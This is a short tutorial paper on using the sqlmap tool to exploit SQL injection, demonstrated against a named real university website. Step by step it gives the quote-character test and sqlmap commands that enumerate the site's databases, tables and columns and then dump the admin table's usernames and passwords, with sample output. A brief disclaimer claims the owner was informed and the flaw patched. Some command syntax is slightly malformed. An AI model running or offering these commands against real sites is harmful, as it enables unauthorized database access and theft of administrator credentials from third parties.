SQLMAP for Website Security Researchers

By : Anuj Khandelwal

Warning: Before the testing the owner of the website is informed and vulnerability has been patched now, we do not endorse hacking live websites and testing on live domains without any official documentation. Respect your countrys law system, this paper is just for education purpose only to understand the attack on websites and how to can countermeasure them. Any trail actions performed by readers after reading this paper will be their responsibility, Author do not help any responsibility of your trails and actions performed.

SQLMAP: SQLMAP is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying

file system and executing commands on the operating system via out-of-band connections.

Requirements for the Testing: 1. VMware Player 2. BackTrack 5 Linux Operating System 3. Wifi Connection 4. Vulnerable Site to Test

Lets Start the Penetration Testing

Step 1: Here we are having target to test here "http://www.hu.edu.pk/viewfaculty.php?id=6" for the demonstration

Step2 : Type = http://www.hu.edu.pk/viewfaculty.php?id=6' in url for checking, if the site is vulnerable. If You get an error such as : "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6'' order by posasc' at line 1" on the Website That Means website is vulnerable.

Step3: Open your VMware Player using BackTrack as your Virtual Machine

Step4: Click the terminal button.

The terminal screen would be opened on your screen , shown in the figure.

Step5 : enter

Write : cd /pentest/database/sqlmap

and press

Step6 : Write "ls" for the list

Step 7 : Now for getting the database of website through python write the following command
python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 dbs

and the python will start its work

As you can see we have found 3 databases available databases [3]: [*] c3results [*] information_schema [*] test Lets see what the first database will provide us

Step 8: Now write python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables

You will get a list of tables in the database , such as follows :

+-----------------------------------------------------------------+ | Havelian | admin || add_list || addmissionfrm |

|---------->Our Target | alumani_pinfo | | bar | bbafinal | | bcomstudents | | |

| alumani_jobinfo | | babscrollnoslip | | bba | bcomr |

From all these tables we are interested in the "admin" table

Step9: Write the command python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin --columns By entering this, you would get something like
+---------+------------------+ | Column | Type |

+---------+------------------+ | id | int(11) unsigned | | |

| passwrd | varchar(25) | u_name | varchar(25) +---------+------------------+

Step10: Write the Final Code python ./sqlmap.py -u www.hu.edu.pk/viewfaculty.php?id=12 -T admin -U test -dump By pressing ENTER key , if there was any other website , then we would have got the Admin username and Password . But in this site the data is entered through FTP. Hence , we get to see the username and password .

About Author
Anuj Khandelwal, Web Security Researcher @ TechDefence Pvt. LTD Connect 2me: www.facebook.com/anujonthemove